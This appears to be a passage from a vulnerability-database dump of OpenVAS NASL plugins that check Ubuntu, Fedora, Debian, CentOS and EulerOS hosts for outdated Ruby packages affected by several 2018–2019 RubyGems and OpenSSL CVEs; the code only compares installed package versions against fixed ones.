isdpkgvuln(pkg:\"libruby1.9.1\", ver:\"1.9.3.484-2ubuntu1.14\", rls:\"UBUNTU14.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"libruby2.0\", ver:\"2.0.0.484-1ubuntu2.13\", rls:\"UBUNTU14.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"ruby1.9.1\", ver:\"1.9.3.484-2ubuntu1.14\", rls:\"UBUNTU14.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"ruby1.9.3\", ver:\"1.9.3.484-2ubuntu1.14\", rls:\"UBUNTU14.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"ruby2.0\", ver:\"2.0.0.484-1ubuntu2.13\", rls:\"UBUNTU14.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU18.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"libruby2.5\", ver:\"2.5.1-1ubuntu1.2\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"ruby2.5\", ver:\"2.5.1-1ubuntu1.2\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU18.10\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"libruby2.5\", ver:\"2.5.1-5ubuntu4.3\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"ruby2.5\", ver:\"2.5.1-5ubuntu4.3\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU16.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"libruby2.3\", ver:\"2.3.1-2~16.04.12\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"ruby2.3\", ver:\"2.3.1-2~16.04.12\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2019-06-21T14:43:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-8320", "CVE-2019-8325", "CVE-2019-8321", "CVE-2019-8323", "CVE-2019-8322", "CVE-2019-8324"], "description": "The remote host is missing an update for the\n ", "modified": "2019-06-21T00:00:00", "published": "2019-05-10T00:00:00", "id": "OPENVAS:1361412562310876346", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876346", "type": "openvas", "title": "Fedora Update for ruby FEDORA-2019-feac6674b7", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876346\");\n script_version(\"2019-06-21T07:26:45+0000\");\n script_cve_id(\"CVE-2019-8320\", \"CVE-2019-8321\", \"CVE-2019-8322\", \"CVE-2019-8323\",\n \"CVE-2019-8324\", \"CVE-2019-8325\");\n script_tag(name:\"cvss_base\", value:\"8.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-06-21 07:26:45 +0000 (Fri, 21 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-10 02:11:44 +0000 (Fri, 10 May 2019)\");\n script_name(\"Fedora Update for ruby FEDORA-2019-feac6674b7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-feac6674b7\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WUFHAULLX3OK2O3CMJLJL6KKISCNX3J5\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the\n 'ruby' package(s) announced via the FEDORA-2019-feac6674b7 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Ruby is the interpreted scripting language\n for quick and easy object-oriented programming. It has many features to process\n text files and to do system management tasks (as in Perl). It is simple,\n straight-forward, and extensible.\");\n\n script_tag(name:\"affected\", value:\"'ruby' package(s) on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC28\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~2.5.5~108.fc28\", rls:\"FC28\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2019-06-21T14:43:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-8320", "CVE-2019-8325", "CVE-2019-8321", "CVE-2019-8323", "CVE-2019-8322", "CVE-2019-8324"], "description": "The remote host is missing an update for the ", "modified": "2019-06-21T00:00:00", "published": "2019-04-18T00:00:00", "id": "OPENVAS:1361412562310704433", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704433", "type": "openvas", "title": "Debian Security Advisory DSA 4433-1 (ruby2.3 - security update)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704433\");\n script_version(\"2019-06-21T07:26:45+0000\");\n script_cve_id(\"CVE-2019-8320\", \"CVE-2019-8321\", \"CVE-2019-8322\", \"CVE-2019-8323\", \"CVE-2019-8324\", \"CVE-2019-8325\");\n script_tag(name:\"cvss_base\", value:\"8.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-06-21 07:26:45 +0000 (Fri, 21 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-18 02:00:08 +0000 (Thu, 18 Apr 2019)\");\n script_name(\"Debian Security Advisory DSA 4433-1 (ruby2.3 - security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2019/dsa-4433.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4433-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ruby2.3'\n package(s) announced via the DSA-4433-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several vulnerabilities have been discovered in the Rubygems included in\nthe interpreter for the Ruby language, which may result in denial of\nservice or the execution of arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"'ruby2.3' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), these problems have been fixed in\nversion 2.3.3-1+deb9u6.\n\nWe recommend that you upgrade your ruby2.3 packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libruby2.3\", ver:\"2.3.3-1+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby2.3\", ver:\"2.3.3-1+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby2.3-dev\", ver:\"2.3.3-1+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby2.3-doc\", ver:\"2.3.3-1+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby2.3-tcltk\", ver:\"2.3.3-1+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2020-01-27T18:34:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-8325", "CVE-2019-8323", "CVE-2019-8322", "CVE-2019-8324"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191597", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191597", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2019-1597)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1597\");\n script_version(\"2020-01-23T12:16:40+0000\");\n script_cve_id(\"CVE-2019-8322\", \"CVE-2019-8323\", \"CVE-2019-8324\", \"CVE-2019-8325\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 12:16:40 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:16:40 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2019-1597)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1597\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1597\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ruby' package(s) announced via the EulerOS-SA-2019-1597 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"rubygems: Installing a malicious gem may lead to arbitrary code execution (CVE-2019-8324)\n\nrubygems: Escape sequence injection vulnerability in gem owner (CVE-2019-8322)\n\nrubygems: Escape sequence injection vulnerability in API response handling (CVE-2019-8323)\n\nrubygems: Escape sequence injection vulnerability in errors (CVE-2019-8325)\");\n\n script_tag(name:\"affected\", value:\"'ruby' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~2.0.0.648~33.h13.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~2.0.0.648~33.h13.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~2.0.0.648~33.h13.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-21T14:43:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-8325", "CVE-2019-8323", "CVE-2019-8322", "CVE-2019-8324"], "description": "The remote host is missing an update for the ", "modified": "2019-06-21T00:00:00", "published": "2019-05-22T00:00:00", "id": "OPENVAS:1361412562310883057", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310883057", "type": "openvas", "title": "CentOS Update for ruby CESA-2019:1235 centos7 ", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.883057\");\n script_version(\"2019-06-21T07:26:45+0000\");\n script_cve_id(\"CVE-2019-8322\", \"CVE-2019-8323\", \"CVE-2019-8324\", \"CVE-2019-8325\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-06-21 07:26:45 +0000 (Fri, 21 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-22 02:00:38 +0000 (Wed, 22 May 2019)\");\n script_name(\"CentOS Update for ruby CESA-2019:1235 centos7 \");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n\n script_xref(name:\"CESA\", value:\"2019:1235\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2019-May/023315.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ruby'\n package(s) announced via the CESA-2019:1235 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Ruby is an extensible, interpreted, object-oriented, scripting language. It\nhas features to process text files and to perform system management tasks.\n\nSecurity Fix(es):\n\n * rubygems: Installing a malicious gem may lead to arbitrary code execution\n(CVE-2019-8324)\n\n * rubygems: Escape sequence injection vulnerability in gem owner\n(CVE-2019-8322)\n\n * rubygems: Escape sequence injection vulnerability in API response\nhandling (CVE-2019-8323)\n\n * rubygems: Escape sequence injection vulnerability in errors\n(CVE-2019-8325)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section.\");\n\n script_tag(name:\"affected\", value:\"'ruby' package(s) on CentOS 7.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"CentOS7\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~2.0.0.648~35.el7_6\", rls:\"CentOS7\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~2.0.0.648~35.el7_6\", rls:\"CentOS7\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-doc\", rpm:\"ruby-doc~2.0.0.648~35.el7_6\", rls:\"CentOS7\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-bigdecimal\", rpm:\"rubygem-bigdecimal~1.2.0~35.el7_6\", rls:\"CentOS7\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-io-console\", rpm:\"rubygem-io-console~0.4.2~35.el7_6\", rls:\"CentOS7\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-json\", rpm:\"rubygem-json~1.7.7~35.el7_6\", rls:\"CentOS7\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-minitest\", rpm:\"rubygem-minitest~4.3.2~35.el7_6\", rls:\"CentOS7\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-psych\", rpm:\"rubygem-psych~2.0.0~35.el7_6\", rls:\"CentOS7\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-rake\", rpm:\"rubygem-rake~0.9.6~35.el7_6\", rls:\"CentOS7\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-rdoc\", rpm:\"rubygem-rdoc~4.0.0~35.el7_6\", rls:\"CentOS7\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygems\", rpm:\"rubygems~2.0.14.1~35.el7_6\", rls:\"CentOS7\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygems-devel\", rpm:\"rubygems-devel~2.0.14.1~35.el7_6\", rls:\"CentOS7\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~2.0.0.648~35.el7_6\", rls:\"CentOS7\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~2.0.0.648~35.el7_6\", rls:\"CentOS7\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~2.0.0.648~35.el7_6\", rls:\"CentOS7\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:40:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-16395", "CVE-2019-8325", "CVE-2018-16396", "CVE-2019-8323", "CVE-2019-8322", "CVE-2019-8324"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191718", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191718", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2019-1718)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1718\");\n script_version(\"2020-01-23T12:20:42+0000\");\n script_cve_id(\"CVE-2018-16395\", \"CVE-2018-16396\", \"CVE-2019-8322\", \"CVE-2019-8323\", \"CVE-2019-8324\", \"CVE-2019-8325\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 12:20:42 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:20:42 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2019-1718)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1718\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1718\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ruby' package(s) announced via the EulerOS-SA-2019-1718 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"rubygems: Installing a malicious gem may lead to arbitrary code execution (CVE-2019-8324)\n\nrubygems: Escape sequence injection vulnerability in gem owner (CVE-2019-8322)\n\nrubygems: Escape sequence injection vulnerability in API response handling (CVE-2019-8323)\n\nrubygems: Escape sequence injection vulnerability in errors (CVE-2019-8325)\");\n\n script_tag(name:\"affected\", value:\"'ruby' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~2.0.0.648~33.h14\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~2.0.0.648~33.h14\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~2.0.0.648~33.h14\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:36:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-16395", "CVE-2019-8325", "CVE-2018-16396", "CVE-2019-8323", "CVE-2019-8322", "CVE-2019-8324"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191617", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191617", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2019-1617)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1617\");\n script_version(\"2020-01-23T14:23:06+0000\");\n script_cve_id(\"CVE-2018-16395\", \"CVE-2018-16396\", \"CVE-2019-8322\", \"CVE-2019-8323\", \"CVE-2019-8324\", \"CVE-2019-8325\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 14:23:06 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:17:30 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2019-1617)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.2\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1617\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1617\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ruby' package(s) announced via the EulerOS-SA-2019-1617 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An issue was discovered in the OpenSSL library in Ruby before 2.3.8, 2.4.x before 2.4.5, 2.5.x before 2.5.2, and 2.6.x before 2.6.0-preview3. When two OpenSSL::X509::Name objects are compared using ==, depending on the ordering, non-equal objects may return true. When the first argument is one character longer than the second, or the second argument contains a character that is one less than a character in the same position of the first argument, the result of == will be true. This 